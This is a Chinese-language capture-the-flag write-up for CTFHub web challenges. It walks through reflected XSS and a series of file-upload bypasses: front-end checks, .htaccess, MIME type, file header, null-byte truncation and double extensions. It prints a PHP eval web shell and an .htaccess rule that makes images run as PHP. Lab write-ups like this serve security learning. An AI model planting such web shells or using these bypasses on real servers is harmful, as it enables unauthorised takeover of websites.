1. 程式人生 > 實用技巧 >CTFHub - Web(四)

CTFHub - Web(四)

最近又是每天忙到裂開,,,淦

xss:

  反射型:

1.第一個輸入框與下面Hello後的內容相同,猜測可以通過該輸入,改變頁面內容。

測試語句:

<script>alert(1)</script>

2.測試第一步中的語句,出現如下回顯,

3.根據url欄可知通過_GET傳入引數,

4.經過測試,第二個輸入框輸入URL時,返回SUCCESS,猜測在後臺進行訪問,

5.使用XSS測試平臺,建立專案,將網址name=後改為平臺提供的程式碼後,send,在專案內容中接收flag,

6.得到flag,

flag:

ctfhub{dd876283c7836e1929c9f9793b95c162d92a7a15}

檔案上傳:

  無驗證:

1.進入頁面,

2.編輯一句話木馬,上傳,

<?php
@eval($_POST['cmd'])
?>

3.用蟻劍連線,進入html目錄,得到flag,

flag:

ctfhub{d9de0e104985706acfc4dac329ff4e3c8415a862}

  前端驗證:

1.隨意上傳一個php檔案,發現該型別不允許上傳,根據提示JS前端驗證,發現函式中的白名單,刪除判斷函式(或者新增php型別),上傳成功,

2.寫入一句話,利用蟻劍進行連線,得到flag,

flag:

ctfhub{3f39f60713f9667252322c17e11eb8f87c59ff77}

  .htaccess:

1.進入頁面,檢視原始碼,發現過濾函式,

2.先上傳個一句話,提示檔案型別不匹配,上傳了一張圖片,上傳成功,根據提示構造.htaccess檔案,檔案內容如下,目的是讓伺服器將jpg解析成php,

AddType application/x-httpd-php .png

3.上傳成功後,接著上傳帶有一句話木馬的jpg檔案,上傳成功後,用蟻劍連線,得到flag,

flag:

ctfhub{acb58985ce696cd969b2017a546120aac5c85414}

補充:

關於.htaccess:
.htaccess檔案是Apache伺服器中的一個配置檔案,它負責相關目錄下的網頁配置。
通過htaccess檔案,可以幫我們實現:網頁301重定向、自定義404錯誤頁面、改變副檔名、允許
/阻止特定的使用者或者目錄的訪問、禁止目錄列表、配置預設文件等功能。

  MIME繞過:

1.上傳一句話,抓包,修改Content-Type為合法型別,將型別改為image/jpeg,

2.蟻劍連線,得到flag,

flag:

ctfhub{bed028163c013365ca24283f879fa4c3a159b068}

補充:

關於MIME:
MIME原本是指多用途網際網路郵件擴充套件型別。
後來被用到了HTTP的Content-Type欄位,稱為網際網路媒體型別。

  檔案頭檢查:

1.上傳一句話木馬(.php),返回,

2.上傳寫有一句話的圖片(gif),返回,

3.抓包,上傳圖碼,在一句話前新增GIF89a(識別gif格式圖片),

4.放包,上傳成功,用蟻劍連線,得到flag,

flag:

參考:

Pass - 14:

https://www.cnblogs.com/3cH0-Nu1L/p/13534170.html

  00截斷:

1.上傳php一句話,並抓包,

2.在位址列可以發現road為上傳檔案的儲存路徑,

3.如果沒有在road路徑這裡截斷,只在檔名截斷,系統會將你傳入的檔案自動儲存在road下,雖然成功傳上去但將檔名自行修改,檔案字尾也會改為你的Content-Type,既要將檔名那裡截斷,在road那裡也要截斷上傳shell,

4.蟻劍連線,得到flag,

補充:

%000x00,/00都屬於00截斷,利用的是伺服器的解析漏洞(ascii中0表示字串結束),所以讀取字串到00就會停止,認為已經結束。

限制條件:

  PHP<5.3.29,且GPC關閉

  雙寫字尾:

1.上傳一句話,抓包,修改檔案字尾php => pphphp,放行,

2.蟻劍連線,得到flag,

flag:

ctfhub{c2d9a4e2969fd3c8de709c8fe16d5a774f8e5276}